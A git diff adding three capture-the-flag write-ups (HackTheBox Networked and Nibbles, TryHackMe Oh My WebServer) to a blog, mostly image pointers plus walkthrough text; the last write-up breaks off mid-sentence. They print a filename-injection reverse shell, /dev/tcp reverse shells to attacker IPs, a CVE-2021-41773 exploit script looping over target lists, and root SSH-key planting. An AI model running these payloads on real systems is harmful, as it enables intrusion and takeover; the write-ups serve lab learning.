diff --git a/content/writeup-ctf/writeup-networked-htb/img/image-7.webp b/content/writeup-ctf/writeup-networked-htb/img/image-7.webp new file mode 100644 index 0000000..6d9ef19 --- /dev/null +++ b/content/writeup-ctf/writeup-networked-htb/img/image-7.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:718ce11fa8ec1af61da4fb486fc17fcd7e78c18ddebdeb0d516a9f08818169f5 +size 1886 diff --git a/content/writeup-ctf/writeup-networked-htb/img/image-8.png b/content/writeup-ctf/writeup-networked-htb/img/image-8.png new file mode 100644 index 0000000..97247f7 --- /dev/null +++ b/content/writeup-ctf/writeup-networked-htb/img/image-8.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b1e374b71b43e37b4ce065233527f10731470aafcb5ef58838c389fac8bd7362 +size 6837 diff --git a/content/writeup-ctf/writeup-networked-htb/img/image-8.webp b/content/writeup-ctf/writeup-networked-htb/img/image-8.webp new file mode 100644 index 0000000..1c30ba5 --- /dev/null +++ b/content/writeup-ctf/writeup-networked-htb/img/image-8.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:4d92aa6a1b5518fa54c4381dd5caa94646cb28eb1a63fe44eda096ff748ec314 +size 5492 diff --git a/content/writeup-ctf/writeup-networked-htb/img/image-9.png b/content/writeup-ctf/writeup-networked-htb/img/image-9.png new file mode 100644 index 0000000..d8e2578 --- /dev/null +++ b/content/writeup-ctf/writeup-networked-htb/img/image-9.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:4d9fe6d798e2f43d38c34abedd2dbd709518f3c06f4ed2369b72ba778e1b7082 +size 8094 diff --git a/content/writeup-ctf/writeup-networked-htb/img/image-9.webp b/content/writeup-ctf/writeup-networked-htb/img/image-9.webp new file mode 100644 index 0000000..f2ac39d --- /dev/null +++ b/content/writeup-ctf/writeup-networked-htb/img/image-9.webp 
@@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:0b78e1395da033681c0764ab8936b4bf1ca948b8c9e5191650457b8ec16a96b1 +size 7388 diff --git a/content/writeup-ctf/writeup-networked-htb/index.md b/content/writeup-ctf/writeup-networked-htb/index.md new file mode 100644 index 0000000..84374f2 --- /dev/null +++ b/content/writeup-ctf/writeup-networked-htb/index.md 
@@ -0,0 +1,194 @@ +--- +title: "Writeup - Networked (HTB)" +date: 2022-05-27 +slug: "writeup-networked-htb" +type: "writeup-ctf" +--- + +This is a writeup for the [Networked](https://app.hackthebox.com/machines/Networked) machine from the HackTheBox site. + +## Enumeration + +First, let's start with a scan of our target with the following command: + + +```bash +nmap -sV -T4 -Pn 10.10.11.146 +``` +Two TCP ports are discovered: + +![](img/image-1.webp) + +- 22/tcp : SSH port (OpenSSH 7.4) +- 80/tcp : HTTP web server (Apache 2.4.6) + +![](img/image-2.webp) + +## Exploit + +First, I start by scanning the pages of the website. + +![](img/image-3.webp) + +I find several pages interesting and especially `backup` in which you can find an archive. + +![](img/image-4.webp) + +I download the archive, unzip it and find the following files inside: + +![](img/image-5.webp) + +The different files correspond to pages of the site: + +![](img/image-6.webp) + +![](img/image-7.webp) + +So we have the possibility to upload images on the `upload.php` page and then to view them on the `photos.php` page. + +By analyzing the source code of the `upload.php` page I find that there are checks on the upload files. + + +```php +[...] +list ($foo,$ext) = getnameUpload($myFile["name"]); + $validext = array('.jpg', '.png', '.gif', '.jpeg'); + $valid = false; + foreach ($validext as $vext) { + if (substr_compare($myFile["name"], $vext, -strlen($vext)) === 0) { + $valid = true; + } + } +[...] +``` +So I'm not just going to be able to send a PHP reverse shell with the `.png` extension because the site checks the file signature to verify its type. The signature of a file is a set of magic byte at the beginning of a file. By looking in the following list I find the signature of the GIF files: [files signatures](https://en.wikipedia.org/wiki/List_of_file_signatures). 
+ +Before adding the signature, my file is simply a Unicode text: + +![](img/image-8.webp) + +After adding the GIF signature, we can see that the file is now identified as a GIF image data. + +![](img/image-9.webp) + +In addition to this signature I will have to change the extensions so that the file passes the security, but also that it is executed as PHP by the server: + + +```bash +mv reverse.jpg reverse.php.gif +``` +I can now upload it and go view it to execute the code and run the reverse shell. + +![](img/image-10.webp) + +I now have a reverse shell as `apache`. But I don't have the access to see the first flag. In the user's home folder, I notice 2 interesting files: + +![](img/image-11.webp) + +The first one is a CRON file that executes the `check_attack.php` script every 3 minutes. + + +```bash +*/3 * * * * php /home/guly/check_attack.php +``` +The second one is the script that allows you to delete suspicious files from the `/var/www/html/uploads` : + + +```php + $value) { + $msg=''; + if ($value == 'index.html') { + continue; + } + #echo "-------------\n"; + + #print "check: $value\n"; + list ($name,$ext) = getnameCheck($value); + $check = check_ip($name,$value); + + if (!($check[0])) { + echo "attack!\n"; + # todo: attach file + file_put_contents($logpath, $msg, FILE_APPEND | LOCK_EX); + + exec("rm -f $logpath"); + exec("nohup /bin/rm -f $path$value > /dev/null 2>&1 &"); + echo "rm -f $path$value\n"; + mail($to, $msg, $msg, $headers, "-F$value"); + } +} + +?> +``` +Interestingly, the script executes an `rm` command with a variable directly. All this without verification! So I will be able to create a file with a name composed of a command. + +The file name will be composed of a name, then a `;` to indicate the end of the command, then a reverse shell in base64 because we are not allowed to put `/` in the file name. 
+ +To create the file I use the following command: + + +```bash +touch /var/www/html/uploads/test';echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC4zLzEyMzUgMD4mMQo= | base64 -d | bash' +``` +I wait a few seconds and now I have a reverse shell and I can get the first flag. + +![](img/image-12.webp) + +## Privilege escalation + +First I check the sudo permissions of my user : + +![](img/image-13.webp) + +I have the right to run the `changename.sh` script as root. Looking at the code of the script, I determine that it allows to change the name of a network interface. + + +```bash +#!/bin/bash -p +cat > /etc/sysconfig/network-scripts/ifcfg-guly << EoF +DEVICE=guly0 +ONBOOT=no +NM_CONTROLLED=no +EoF + +regexp="^[a-zA-Z0-9_\ /-]+$" + +for var in NAME PROXY_METHOD BROWSER_ONLY BOOTPROTO; do + echo "interface $var:" + read x + while [[ ! $x =~ $regexp ]]; do + echo "wrong input, try again" + echo "interface $var:" + read x + done + echo $var=$x >> /etc/sysconfig/network-scripts/ifcfg-guly +done +``` +After some research on the Linux distributions used by the machine I find the following flaw: [CentOS Network Interface Exploit](https://vulmon.com/exploitdetails?qidtp=maillist_fulldisclosure&qid=e026a0c5f83df4fd532442e1324ffa4f). + +On CentOS there is an exploit that allows to execute commands as `root` via the name of a network interface. + +I execute the script and enter the following name for the interface: + +![](img/image-14.webp) + +I now have a reverse shell `root` and I can get the last flag. + +## Recommendations + +To patch this host I think it would be necessary to perform a number of actions: + +- Do not leave the source code of the website accessible by all +- Set up an additional protection on the upload to avoid sending code +- Do not use variables in commands without Sanitizing diff --git a/content/writeup-ctf/writeup-nibbles-htb/featured.png b/content/writeup-ctf/writeup-nibbles-htb/featured.png new file mode 100644 index 0000000..a1efe55 --- /dev/null 
+++ b/content/writeup-ctf/writeup-nibbles-htb/featured.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:2728984adb9ff67af8ccd0e721d18a0580cf655db339d379252e5d86c7ed983b +size 242961 diff --git a/content/writeup-ctf/writeup-nibbles-htb/featured.webp b/content/writeup-ctf/writeup-nibbles-htb/featured.webp new file mode 100644 index 0000000..b0e326a --- /dev/null +++ b/content/writeup-ctf/writeup-nibbles-htb/featured.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:1030fe0d3e3815f705465f28566fa0873f4b32e583bc828eeb2dadd19cbeebd8 +size 25880 diff --git a/content/writeup-ctf/writeup-nibbles-htb/img/image-1.png b/content/writeup-ctf/writeup-nibbles-htb/img/image-1.png new file mode 100644 index 0000000..f30d1e7 --- /dev/null +++ b/content/writeup-ctf/writeup-nibbles-htb/img/image-1.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:8cb046b79ecab50607331c162c8f5ad06f3c3b9a3d0838c06c270032bb1a6405 +size 35033 diff --git a/content/writeup-ctf/writeup-nibbles-htb/img/image-1.webp b/content/writeup-ctf/writeup-nibbles-htb/img/image-1.webp new file mode 100644 index 0000000..35d41ed --- /dev/null +++ b/content/writeup-ctf/writeup-nibbles-htb/img/image-1.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:6efca91a26b3e8ef34f20d032c75c22c3cdc2e01c81391c12f44d8bbd0dc1cd4 +size 30446 diff --git a/content/writeup-ctf/writeup-nibbles-htb/img/image-10.png b/content/writeup-ctf/writeup-nibbles-htb/img/image-10.png new file mode 100644 index 0000000..2eae908 --- /dev/null +++ b/content/writeup-ctf/writeup-nibbles-htb/img/image-10.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d876bd1693160bf180f3424b2382dbd249c4c575131c6997ecab621404dea501 +size 38478 diff --git a/content/writeup-ctf/writeup-nibbles-htb/img/image-10.webp b/content/writeup-ctf/writeup-nibbles-htb/img/image-10.webp new file mode 100644 index 0000000..8a85a0f --- /dev/null 
+++ b/content/writeup-ctf/writeup-nibbles-htb/img/image-10.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:8c6ba9a629a19d3e945ba76885dd95d47726057322cd806704ab39a339cec652 +size 48086 diff --git a/content/writeup-ctf/writeup-nibbles-htb/img/image-2.png b/content/writeup-ctf/writeup-nibbles-htb/img/image-2.png new file mode 100644 index 0000000..d78bf9f --- /dev/null +++ b/content/writeup-ctf/writeup-nibbles-htb/img/image-2.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:afe438e7ea228e870d34aae4ef8c60d50c1e55cc7f23c4d71cc226ddca9b2ccd +size 21888 diff --git a/content/writeup-ctf/writeup-nibbles-htb/img/image-2.webp b/content/writeup-ctf/writeup-nibbles-htb/img/image-2.webp new file mode 100644 index 0000000..84f69cc --- /dev/null +++ b/content/writeup-ctf/writeup-nibbles-htb/img/image-2.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5ecbd2bddf49e40bbcca9fce273cada3dc3341c31bd3b17888369ab067a7c60c +size 11970 diff --git a/content/writeup-ctf/writeup-nibbles-htb/img/image-3.png b/content/writeup-ctf/writeup-nibbles-htb/img/image-3.png new file mode 100644 index 0000000..bbfc080 --- /dev/null +++ b/content/writeup-ctf/writeup-nibbles-htb/img/image-3.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:a1a132471cef563e4209ea6b92d5bdaf37911e8f6334ee2f657a2844212a9c66 +size 74495 diff --git a/content/writeup-ctf/writeup-nibbles-htb/img/image-3.webp b/content/writeup-ctf/writeup-nibbles-htb/img/image-3.webp new file mode 100644 index 0000000..08c3d14 --- /dev/null +++ b/content/writeup-ctf/writeup-nibbles-htb/img/image-3.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:32c6d25f6dfd1e46e99e5029408c847e280e61938a4988985bfa6bcbf29b2775 +size 75378 diff --git a/content/writeup-ctf/writeup-nibbles-htb/img/image-4.png b/content/writeup-ctf/writeup-nibbles-htb/img/image-4.png new file mode 100644 index 0000000..3bc6c6a --- /dev/null 
+++ b/content/writeup-ctf/writeup-nibbles-htb/img/image-4.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d5cd379a409cfd68429a3d49cde20d2e30aad7ea57a1e43699de532df2813076 +size 10254 diff --git a/content/writeup-ctf/writeup-nibbles-htb/img/image-4.webp b/content/writeup-ctf/writeup-nibbles-htb/img/image-4.webp new file mode 100644 index 0000000..b208426 --- /dev/null +++ b/content/writeup-ctf/writeup-nibbles-htb/img/image-4.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:1cc0846c299dfeb2ff6759d79ee1da420c15dad2e152611c31e808da06d135cc +size 6172 diff --git a/content/writeup-ctf/writeup-nibbles-htb/img/image-5.png b/content/writeup-ctf/writeup-nibbles-htb/img/image-5.png new file mode 100644 index 0000000..3af2beb --- /dev/null +++ b/content/writeup-ctf/writeup-nibbles-htb/img/image-5.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:125debd8b152b36dc14d632690878453337c31668581a28fa1d7afdf7818eaec +size 121057 diff --git a/content/writeup-ctf/writeup-nibbles-htb/img/image-5.webp b/content/writeup-ctf/writeup-nibbles-htb/img/image-5.webp new file mode 100644 index 0000000..c2c6b15 --- /dev/null +++ b/content/writeup-ctf/writeup-nibbles-htb/img/image-5.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:1e7d7e2df5c7139a72a0a8da5cf3ba3267f284d7fb63fd3cc660829eaae2e452 +size 124196 diff --git a/content/writeup-ctf/writeup-nibbles-htb/img/image-6.png b/content/writeup-ctf/writeup-nibbles-htb/img/image-6.png new file mode 100644 index 0000000..e48bdec --- /dev/null +++ b/content/writeup-ctf/writeup-nibbles-htb/img/image-6.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:72f78bd5fc1e55cb8611ab2e1cd7db9d79d7029655b6a91634686fd3711c639f +size 18545 diff --git a/content/writeup-ctf/writeup-nibbles-htb/img/image-6.webp b/content/writeup-ctf/writeup-nibbles-htb/img/image-6.webp new file mode 100644 index 0000000..7dd934c --- /dev/null 
+++ b/content/writeup-ctf/writeup-nibbles-htb/img/image-6.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:77e99f6755423f77fbd9d3eeb9b7f3e5f1efd4446066b090850c2f82f326b4d8 +size 10326 diff --git a/content/writeup-ctf/writeup-nibbles-htb/img/image-7.png b/content/writeup-ctf/writeup-nibbles-htb/img/image-7.png new file mode 100644 index 0000000..ca8343e --- /dev/null +++ b/content/writeup-ctf/writeup-nibbles-htb/img/image-7.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f86b0817fd5424f504f74a1619d208ab8f7aabdf2fd3c9e4b165214a95e1b39d +size 39876 diff --git a/content/writeup-ctf/writeup-nibbles-htb/img/image-7.webp b/content/writeup-ctf/writeup-nibbles-htb/img/image-7.webp new file mode 100644 index 0000000..392ea48 --- /dev/null +++ b/content/writeup-ctf/writeup-nibbles-htb/img/image-7.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:14a15c6cb8a9dbb9edfae7f56356cfef350141e91444f663a6f96e9fc4d898e5 +size 35382 diff --git a/content/writeup-ctf/writeup-nibbles-htb/img/image-8.png b/content/writeup-ctf/writeup-nibbles-htb/img/image-8.png new file mode 100644 index 0000000..e735b7c --- /dev/null +++ b/content/writeup-ctf/writeup-nibbles-htb/img/image-8.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:fb2472f7d76d9eb1774d057bece45404bf50d5da5ba7dac964bd062f3913aa8a +size 16941 diff --git a/content/writeup-ctf/writeup-nibbles-htb/img/image-8.webp b/content/writeup-ctf/writeup-nibbles-htb/img/image-8.webp new file mode 100644 index 0000000..afb54c9 --- /dev/null +++ b/content/writeup-ctf/writeup-nibbles-htb/img/image-8.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:bdcf1b62e54dbed0197e40692953eafcf148a761b154f05fab8615db71da66e6 +size 20754 diff --git a/content/writeup-ctf/writeup-nibbles-htb/img/image-9.png b/content/writeup-ctf/writeup-nibbles-htb/img/image-9.png new file mode 100644 index 0000000..b780c95 --- /dev/null 
+++ b/content/writeup-ctf/writeup-nibbles-htb/img/image-9.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:62a1b24239485495ddd0cabdee2b497686d29db42e199870988218831ae85c4b +size 9411 diff --git a/content/writeup-ctf/writeup-nibbles-htb/img/image-9.webp b/content/writeup-ctf/writeup-nibbles-htb/img/image-9.webp new file mode 100644 index 0000000..6d5137e --- /dev/null +++ b/content/writeup-ctf/writeup-nibbles-htb/img/image-9.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:9e9c6eda536e8ac7214645ea22f454c7490157e2aef04bb8d07aebc12cf6271a +size 13398 diff --git a/content/writeup-ctf/writeup-nibbles-htb/index.md b/content/writeup-ctf/writeup-nibbles-htb/index.md new file mode 100644 index 0000000..9c2e532 --- /dev/null +++ b/content/writeup-ctf/writeup-nibbles-htb/index.md 
@@ -0,0 +1,101 @@ +--- +title: "Writeup - Nibbles (HTB)" +date: 2022-05-17 +slug: "writeup-nibbles-htb" +type: "writeup-ctf" +--- + +This is a writeup for the [Nibbles](https://app.hackthebox.com/machines/Nibbles) machine from the HackTheBox site. + +## Enumeration + +First, let's start with a scan of our target with the following command: + + +```bash +nmap -sV -T4 -Pn 10.10.11.146 +``` +Two TCP ports are discovered: + +![](img/image-1.webp) + +- 22/tcp : SSH port (OpenSSH 7.2p2) +- 80/tcp : HTTP web server (Apache 2.4.18) + +## Exploit + +Looking at the source code of the web page I found the following comment: + + +```bash + +``` +So I go to this new page: + +![](img/image-2.webp) + +I then search the pages present on the site with `ffuf`. + +![](img/image-3.webp) + +One page is particularly interesting: `admin`. + +![](img/image-4.webp) + +So I try to brute force the password of the `admin` user with the `hydra` command. + +![](img/image-5.webp) + +Although the command finds several results it does not work. Indeed there is an anti-brute force security. So I try to test common passwords and after a few tries I find the following credentials: `admin/nibbles`. + +It's good but rather frustrating not to have found a more legit way. After some research I find a solution online to test passwords taking into account the anti brute force: [brute force version](https://eightytwo.net/blog/brute-forcing-the-admin-password-on-nibbles/). + +I can now connect to the admin panel! After going through the panel, I find the following page where you can upload images. + +![](img/image-6.webp) + +So I try to send a reverse shell in php, then I go to the following link to execute it: + + +```bash +10.10.10.75/nibbleblog/content/private/plugins/my_image/image.php +``` +I now have a reverse shell as a `nibbler` and I can get the first flag. 
+ +![](img/image-7.webp) + +## Privilege escalation + +I start by checking the sudo permissions of my user: + +![](img/image-8.webp) + +I find it in my personal folder a `.zip` file, I unzip it : + +![](img/image-9.webp) + +The script can be modified by myself and can be executed as root. I put the following content in the script `monitor.sh` : + + +```bash +mkdir /root/.ssh +touch /root/.ssh/authorized_keys +echo 'id_rsa' > /root/.ssh/authorized_keys +``` +This will create the SSH folder of the root user and then add my key in the `authorized_keys`. To execute the script I use the following command: + + +```bash +sudo -n ./monitor.sh +``` +I can now log in as root and get the last flag. + +![](img/image-10.webp) + +## Recommendations + +To patch this host I think it would be necessary to perform a number of actions: + +- Do not leave important comments in HTML code +- Update NibbleBlog to fix file upload problem +- Do not let user-modifiable scripts be executed by the root user diff --git a/content/writeup-ctf/writeup-oh-my-webserver-thm/featured.png b/content/writeup-ctf/writeup-oh-my-webserver-thm/featured.png new file mode 100644 index 0000000..57e8b7e --- /dev/null +++ b/content/writeup-ctf/writeup-oh-my-webserver-thm/featured.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ca424309d980684aefa5f9eed353222ff02c32896da283858be3575c70ae7aa8 +size 482981 diff --git a/content/writeup-ctf/writeup-oh-my-webserver-thm/featured.webp b/content/writeup-ctf/writeup-oh-my-webserver-thm/featured.webp new file mode 100644 index 0000000..ae7da16 --- /dev/null +++ b/content/writeup-ctf/writeup-oh-my-webserver-thm/featured.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d3f9b7f4413642ac680ac2ee76585560f215b8af2715b8b2270bf5d7fedecf3a +size 482464 
diff --git a/content/writeup-ctf/writeup-oh-my-webserver-thm/img/image-1.png b/content/writeup-ctf/writeup-oh-my-webserver-thm/img/image-1.png new file mode 100644 index 0000000..42888ce --- /dev/null +++ b/content/writeup-ctf/writeup-oh-my-webserver-thm/img/image-1.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:0325f75ba2e071c53a8dd6832558e7cf57d0534e1a0b7cc0e061037da368a53c +size 44434 diff --git a/content/writeup-ctf/writeup-oh-my-webserver-thm/img/image-1.webp b/content/writeup-ctf/writeup-oh-my-webserver-thm/img/image-1.webp new file mode 100644 index 0000000..2d51207 --- /dev/null +++ b/content/writeup-ctf/writeup-oh-my-webserver-thm/img/image-1.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:25ca1e7534478abacb27fd747798e567bacb8fe7b619ee763124099efe24864c +size 36242 diff --git a/content/writeup-ctf/writeup-oh-my-webserver-thm/img/image-2.png b/content/writeup-ctf/writeup-oh-my-webserver-thm/img/image-2.png new file mode 100644 index 0000000..02edb76 --- /dev/null +++ b/content/writeup-ctf/writeup-oh-my-webserver-thm/img/image-2.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ac4d5d29657495c3d2abbca0a27072ffbb3658e6f23f8c251ba07ac8e85ee7df +size 320376 diff --git a/content/writeup-ctf/writeup-oh-my-webserver-thm/img/image-2.webp b/content/writeup-ctf/writeup-oh-my-webserver-thm/img/image-2.webp new file mode 100644 index 0000000..159426c --- /dev/null +++ b/content/writeup-ctf/writeup-oh-my-webserver-thm/img/image-2.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:aa7b1cc87107152d6212f1edb12daf2981b359b871776e9600b6d8907c8738fd +size 67106 diff --git a/content/writeup-ctf/writeup-oh-my-webserver-thm/img/image-3.png b/content/writeup-ctf/writeup-oh-my-webserver-thm/img/image-3.png new file mode 100644 index 0000000..067501a --- /dev/null +++ b/content/writeup-ctf/writeup-oh-my-webserver-thm/img/image-3.png 
@@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:49b29bb2d7c67cf64ebba15266481697b08da9cd1b34f5315f773632a247e3f6 +size 10637 diff --git a/content/writeup-ctf/writeup-oh-my-webserver-thm/img/image-3.webp b/content/writeup-ctf/writeup-oh-my-webserver-thm/img/image-3.webp new file mode 100644 index 0000000..0309895 --- /dev/null +++ b/content/writeup-ctf/writeup-oh-my-webserver-thm/img/image-3.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:8f6dc6353f22b67dcc74f3e2c5c04ca2c761a3c2de08457c6edc69757bb289ed +size 8988 diff --git a/content/writeup-ctf/writeup-oh-my-webserver-thm/img/image-4.png b/content/writeup-ctf/writeup-oh-my-webserver-thm/img/image-4.png new file mode 100644 index 0000000..544f231 --- /dev/null +++ b/content/writeup-ctf/writeup-oh-my-webserver-thm/img/image-4.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:372f02d4abf77a951ba97c499f1fcb3a45ff37948fad95e63fd42a8dffc0e29a +size 21100 diff --git a/content/writeup-ctf/writeup-oh-my-webserver-thm/img/image-4.webp b/content/writeup-ctf/writeup-oh-my-webserver-thm/img/image-4.webp new file mode 100644 index 0000000..8bf815d --- /dev/null +++ b/content/writeup-ctf/writeup-oh-my-webserver-thm/img/image-4.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b1a7421241ba654ca030d9945d4cf3636b0acaa1128b7dbac6d8d41da8fae945 +size 14096 diff --git a/content/writeup-ctf/writeup-oh-my-webserver-thm/img/image-5.png b/content/writeup-ctf/writeup-oh-my-webserver-thm/img/image-5.png new file mode 100644 index 0000000..f0f9a4c --- /dev/null +++ b/content/writeup-ctf/writeup-oh-my-webserver-thm/img/image-5.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:2351d8ba7bc08b6932ad9cf5c25d821e0f25e20c2fe053be59f76cec36f5823f +size 44982 
diff --git a/content/writeup-ctf/writeup-oh-my-webserver-thm/img/image-5.webp b/content/writeup-ctf/writeup-oh-my-webserver-thm/img/image-5.webp new file mode 100644 index 0000000..6d18d3e --- /dev/null +++ b/content/writeup-ctf/writeup-oh-my-webserver-thm/img/image-5.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:020e86a0b229d11f58d79383ecb8e6280f968e2e9c9d67338ef7cdf92e7ed02f +size 38572 diff --git a/content/writeup-ctf/writeup-oh-my-webserver-thm/img/image-6.png b/content/writeup-ctf/writeup-oh-my-webserver-thm/img/image-6.png new file mode 100644 index 0000000..4ea0353 --- /dev/null +++ b/content/writeup-ctf/writeup-oh-my-webserver-thm/img/image-6.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:899e1377d273f0d9ff7a0a721e5d2fd5f7884f031f83b19ec58a32d5a1c3e8b4 +size 21732 diff --git a/content/writeup-ctf/writeup-oh-my-webserver-thm/img/image-6.webp b/content/writeup-ctf/writeup-oh-my-webserver-thm/img/image-6.webp new file mode 100644 index 0000000..439cf66 --- /dev/null +++ b/content/writeup-ctf/writeup-oh-my-webserver-thm/img/image-6.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:3901df76c761988582d057835727d31b1e0fb6b29f18a3930787bf8bd9a4a229 +size 16766 diff --git a/content/writeup-ctf/writeup-oh-my-webserver-thm/img/image-7.png b/content/writeup-ctf/writeup-oh-my-webserver-thm/img/image-7.png new file mode 100644 index 0000000..7b5f71f --- /dev/null +++ b/content/writeup-ctf/writeup-oh-my-webserver-thm/img/image-7.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:bd6a473c03da066e20d293a8294a92067ddac48fdc14380e089058418aeed1af +size 32835 diff --git a/content/writeup-ctf/writeup-oh-my-webserver-thm/img/image-7.webp b/content/writeup-ctf/writeup-oh-my-webserver-thm/img/image-7.webp new file mode 100644 index 0000000..147ca3b --- /dev/null +++ b/content/writeup-ctf/writeup-oh-my-webserver-thm/img/image-7.webp 
@@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ff038f690a3a7f6ae325711eb3d315087d6fceb64d3346a466a1cf0a7f5b5cf7 +size 22312 diff --git a/content/writeup-ctf/writeup-oh-my-webserver-thm/img/image-8.png b/content/writeup-ctf/writeup-oh-my-webserver-thm/img/image-8.png new file mode 100644 index 0000000..90ba36d --- /dev/null +++ b/content/writeup-ctf/writeup-oh-my-webserver-thm/img/image-8.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f2b110853c2f30a01693811870e7d5cee63d8d47e993d038874c2df644422f7d +size 23909 diff --git a/content/writeup-ctf/writeup-oh-my-webserver-thm/img/image-8.webp b/content/writeup-ctf/writeup-oh-my-webserver-thm/img/image-8.webp new file mode 100644 index 0000000..a374d9a --- /dev/null +++ b/content/writeup-ctf/writeup-oh-my-webserver-thm/img/image-8.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:06fee1be334b0f228b82af19df52815f06c53c4e2a8f99048723bfb0cc9c72a9 +size 18808 diff --git a/content/writeup-ctf/writeup-oh-my-webserver-thm/index.md b/content/writeup-ctf/writeup-oh-my-webserver-thm/index.md new file mode 100644 index 0000000..05f2ca5 --- /dev/null +++ b/content/writeup-ctf/writeup-oh-my-webserver-thm/index.md 
@@ -0,0 +1,120 @@ +--- +title: "Writeup - Oh My WebServer (THM)" +date: 2022-03-10 +slug: "writeup-oh-my-webserver-thm" +type: "writeup-ctf" +--- + +This is a writeup for the [oh my webserver](https://tryhackme.com/room/ohmyweb) machine from the TryHackMe site. + +## Enumeration + +First, let's start with a scan of our target with the following command: + + +```bash +nmap -sV 10.10.9.138 +``` +Two TCP ports are discovered: + +![](img/image-1.webp) + +- 22/tcp : SSH port (OpenSSH 8.2p1) +- 80/tcp : HTTP web server (Apache 2.4.49) + +![](img/image-2.webp) + +## Exploit + +After some research, I find that this version of Apache is exploitable with the [CVE-2021-41773](https://www.exploit-db.com/exploits/50383). This exploit allows to execute code via a transverse path. + +So I create a shell script with the following content: + + +```bash +#!/bin/bash + +if [[ $1 == '' ]]; [[ $2 == '' ]]; then +echo Set [TAGET-LIST.TXT] [PATH] [COMMAND] +echo ./PoC.sh targets.txt /etc/passwd +exit +fi +for host in $(cat $1); do +echo $host +curl -s --path-as-is -d "echo Content-Type: text/plain; echo; $3" "$host/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e$2"; done +``` +After adding the execution rights, I run the script with the id command to check that the target is exploitable with this exploit. + +![](img/image-3.webp) + +The exploit works, now let's create a reverse shell : + + +```bash +bash exploit.sh targets.txt /bin/sh 'bash -c "bash -i >& /dev/tcp/10.8.3.186/1234 0>&1"' +``` +![](img/image-4.webp) + +I am now connected, but I quickly notice that I am in a docker. 
I upload [linPeas](linpeas.sh), to make a first analysis of the environment: + + +```bash +daemon@4a70924bafa0:/tmp$ curl 10.8.3.186:81/linpeas.sh > linpeas.sh + % Total % Received % Xferd Average Speed Time Time Time Current + Dload Upload Total Spent Left Speed +100 747k 100 747k 0 0 3415k 0 --:--:-- --:--:-- --:--:-- 3415k +daemon@4a70924bafa0:/tmp$ chmod +x linpeas.sh +``` +![](img/image-5.webp) + +Python3 has a "cap\_setuid", I will be able to use this to get the route access in the docker. To do this I use the command found on [GTFOBins](https://gtfobins.github.io/gtfobins/python/#capabilities) : + + +```bash +python3 -c 'import os; os.setuid(0); os.system("/bin/sh")' +``` +![](img/image-6.webp) + +I now have root access in the docker and I can get the first flag! + +## Privilege escalation + +I'm still in a docker, so to take control of the target machine I'll have to find a way out of the docker... + +Generally, there are open ports between the host and a docker. These ports are used for services (web, database, ...), but also in some cases for docker management. + +So I will first perform an nmap scan in the docker. To do this I 